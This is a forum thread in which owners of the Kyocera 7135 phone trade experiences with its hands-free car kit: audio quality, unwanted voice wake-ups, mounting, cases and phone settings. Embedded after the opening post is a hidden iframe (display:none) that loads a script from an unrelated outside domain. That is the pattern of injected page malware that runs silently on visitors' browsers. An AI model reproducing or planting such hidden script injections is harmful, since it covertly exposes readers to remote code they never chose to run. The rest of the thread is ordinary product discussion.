+ Reply to Thread
Page 1 of 2 1 2 LastLast

Quality / Feedback from HF Car kit users?

I am considering getting the portable HF car kit and hacking it apart for use with my Audi factory wired interface (through radio speakers, mic already in dash).

Just curious what the quality was like, and how it sounded to people on the other end. I realize mine will be a little different, since I will have another mic being used, but I'd just like a general feel.

Thanks,
    -Ed<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sound quality seems fine. I haven't specifically asked anyone "how do I sound?" but no one has asked me if I'm on a speakerphone. However, The "wake up" process is a pain in the ---. When you want to voice dial a call you say 'wake up', a tone will sound, and then 'wake up' again and you can voice dial. The problem is the radio or general conversation easily initiates the process. Then you hear 'please say a name' three times before it says 'exiting voice recognizer'. The only way I've been able to get by is to unplug the microphone.:complain

Originally posted by rbiowa
    Sound quality seems fine. I haven't specifically asked anyone "how do I sound?" but no one has asked me if I'm on a speakerphone. However, The "wake up" process is a pain in the ---. When you want to voice dial a call you say 'wake up', a tone will sound, and then 'wake up' again and you can voice dial. The problem is the radio or general conversation easily initiates the process. Then you hear 'please say a name' three times before it says 'exiting voice recognizer'. The only way I've been able to get by is to unplug the microphone.:complain
    You might want to try to re-train your wake-up phrase. I have never had mine false start or miss an actuall wake-up attempt yet, and I have the radio playing all the time.

I just wish there was a hang-up button either on the HS kit or on the outside of the phone. I need to open the flip in order to hang up. I will be mounting a cradle for the phone, so that will get easier, but right now, I just pop the phone into the cup holder and it doesn't sit there well when open.....

Alan

I have retrained my 'wake-up' function a number of times. Today I coughed and it detected it. Oh well, I love everything else about the phone.

On my current phone (Motorola v120) - as I await the Verizon release of the 7135 - I had a few problems with voice dialing. I originally trained the names in my quiet office, but found that wasn't very helpful for real world use. I retrained in the car with little improvement. However, training in the car while moving with average road noise made a considerable improvement in accuracy! When I later connected a HF kit, I retrained the most common names which now are poorly recognized if I'm not using the external mike.

alerts w/ HF kit

I have noticed that when I plug the phone to the car kit, sometimes it gives me false alerts. It's like an alert when someone sends a text message. I have not found a way to stop it. I have turned off all alerts, checked voive mail and text mail, but it still gives me an alert. It only does it when hooked to the kit and not by itself or when plugged to power adaptor.

Hands Free OEM car kit excellent . . .

Received the Kyo car kit on Fri from Dan's (saved 20 bucks)

I owned the Qualcom one for my 6035. (Qualcom owns Kyo) That one was junk.
    Worst part was you had to hard wire the microphone around your car winshield. It was useless, if you rented a car or tried to use it in your second car (unless you tore the wire back out). I could never find a second microphone from Radio Shack or anywhere else. So after paying $69 + after the law in NY went to hands free or headset when you are on a phone . . . I bought the 6035 kit. Always sounded tinny, faded in and out, and now I think it doesn't work at all.

But the OEM ($45.99 Dan's) is amazing. There is no Microphone wire. A small mic plugs into the side of the unit. The unit plugs into the cig lighter and the cord plugs into the 7135 and thats it thats all.

It also adjusts for angles (the 6035 kit only had one adjustment)
    also comes with a visor type ball and clip for mounting elsewhere and velcro.

But heres the best part. You set your phone under "phone pref" and check off "auto answer in 5 secs".
    So now when the phone rings . . . You don't need to touch the phone or open the flip! The kit picks up the call automatically and you're talking with your caller from both ends "loud and clear". When your incoming call hangs up it auto disconnects. This is a poor man's built in phone system like in a Mercedes.

Can be switched instantly to another car just by unplugging it from your lighter (with no wires).

You probably can set it for voice dial by just saying home, work etc.

Tip: If you try voice calling, from my experience, record your voice over the speaker phone rather than the phone. It's hard for the system to recognize your voice when it sounds different from the phone to the speaker phone. same for the phones built in speaker phone vs recording over the 7135 with the speaker phne off (your voice sounds different with each method of recording to the voice recognition system).

Doesn't matter if you are in a hands free/headphone required by state law or not . . . this is an excellent well made must have accessory for the 7135.

One design flaw in my opinion (pay attention Kyocera technicians)
    there is no on off switch. So you have to pull it out slightly from the lighter to turn it off. It has a light to tell you when it's on. but the documentation says it could drain your battery, I don't think it draws much current, but if you went on vacation, in cold weather, if you forgot to pull it out, you might come home to a dead battery. The fix for this is to rewire your lighter to be on only with the key in the lock.

Let me know how some of you like this kit if you already own one and how it's working out for you.

I like it a lot. The voice recognition works well and I like the fact that you can set it to ask you whether you want to answer an incoming call. I am still surprised when I'm driving along and a womans's voice asks the question. The only drawback I've found (and it is really with the phone) is that the 7135 has to be in the phone mode for you to initiate a call with the speaker phone. It is minor, but I have to remember to check before I start driving. All in all, a great accessory.

HF Car Kit

Agreed on all points. I think it's a great add on. I had thought about finding a way to permanently mount the car kit, but it works so well, I think I have decided against it.

I would think that if I go on the road/vacation and have to rent a car, I would love to have the car kit with me, and if I permanently mount it...I will be outta luck.

I am still looking for mounting options for the phone. For now I am going with a universal console mount with the adjustable swivel from www.proclipusa.com (the mother-in-law is getting it for my birthday next month) and a modifed belt holster that I got from Dan's for $5. That should do until someone comes up with a holder that is better.

All in all I thought I would not like the HFK as is...but I really do. The only thing that I fear, is losing the microphone if I decide to move the HFK from car to car.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Does the phone fit into the HFK similar to fitting into the holster? If so, can you leave the leather cover on the phone?
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Does anyone have complaints from the party they are calling that sometimes the you are "cutting out". Even though this thing is supposed to be "full duplex" it seems it is more like it is a VOX (voice operated relay) system which is one way. (they talk, you talk). This doesn't seem to be a problem all of the time, but I do get people complaining about it. I'm on my second one, by the way which seems much better.

Originally posted by Krazman
    Does the phone fit into the HFK similar to fitting into the holster? If so, can you leave the leather cover on the phone?
    Not exactly sure what you are asking here.

The HFK has a plug that uses the same part of the bottom of the phone as the sync cradle. Since I don't have the leather pouch, I can only assume this part is open.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Just looked at the pix on the Kyocera site. To answer my own question, it appears that the phone is just teathered to the cable and the speaker/mic plugs into the lighter outlet. Therefore, the phone sits wherever you put it! And it would also fit with the leather case on the phone.

Someone please correct me if I am wwwwrroooonnnnggggggg!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Yes, plug fits either . .

Both the holster (bottom cutout) and the Leather case are set up to allow the plug to plug in the bottom without taking the phone out. The holster could further be clipped onto something in the car so the phone doesn't move around. The phone could also be clipped with the leather case but because this case has a quick release button the clip has more play in it. So the holster would give you a more stable holder for the phone while its clipped to the dash. The Lleather case would tend to flop sideways.
    The leather case is unique the way it goes on the phone but it does not offer the protection for the phone some might want. It only really protects the front and back from bumps and scratches. The phone is exposed on one side in the holster an open to scratches. The best bet for protection is the leather pouch but since I don't have one I can't say it has a cut out for the plug. If it didn't, it would be simple enoough to slit a small slot with a razor blade in it. But if you are looking towards using the hands free kit you wouldn't use the pouch because you have to take it out of the case to dial. Best bet with HFK would probably be the leather case.

Folks

Any chance of a picture?? I am going to try and source this HFK down here or perhaps directly from Dan's if someone could give me their web address.

Cheers

Chris
    Chris

Re: Yes, plug fits either . .

Originally posted by Expidia
    The leather case is unique the way it goes on the phone but it does not offer the protection for the phone some might want. It only really protects the front and back from bumps and scratches. The phone is exposed on one side in the holster an open to scratches. The best bet for protection is the leather pouch but since I don't have one I can't say it has a cut out for the plug.
    I have the leather pouch, and it does have an opening in the bottom. I also have the leather case, and use it primarily (I still have yet to use the holster, except to try it out for a minute). I agree that the pouch offers better overall protection... but only while the 7135 is not in use! The leather case give me a little piece of mind that if I drop it the case will give it a little cushion. But I'm never going to drop it anyway.
    Please visit my picture site: Robert-O-Rama :)

For the poster that wanted a pic . . .

All the 7135 accessories can be viewed at:

http://store.kyocera-wireless.com/pr...RGE190D2WPBFF9

Just click on a pic to view it a little larger. But don't buy them from Kyocera. By the same OEM accessories from Danscellphones@aol.com!

Re: Lnoble's ? turning phone on . . .

If you go into phone pref and then flip settings and check off "show phone display" whenever you close the phone it goes into phone mode. I use my phone as a phone first so I prefer to to have it on phone whenever I open it instead of opening to where ever you last left off on the Palm. So this flip setting is benefit when using the HFK as all you have to do is plug it in and you are ready to go!

7135 Kyo Car Kit

I don't know how everyone else is doing with their car kit, but most people that I am talking to say I cut in and out a lot... I went to radio shack to try and buy an extention cord to put the "stubby" little mike closer to me, but they didn't have the right stuff...

Has anyone come up with a solution for this or am i the only one with the issue???

Just got my 7135, and when using it with the HF kit, it doesn't seem to ring through the phone or speaker. Am I missing a setting somewhere?

Kevin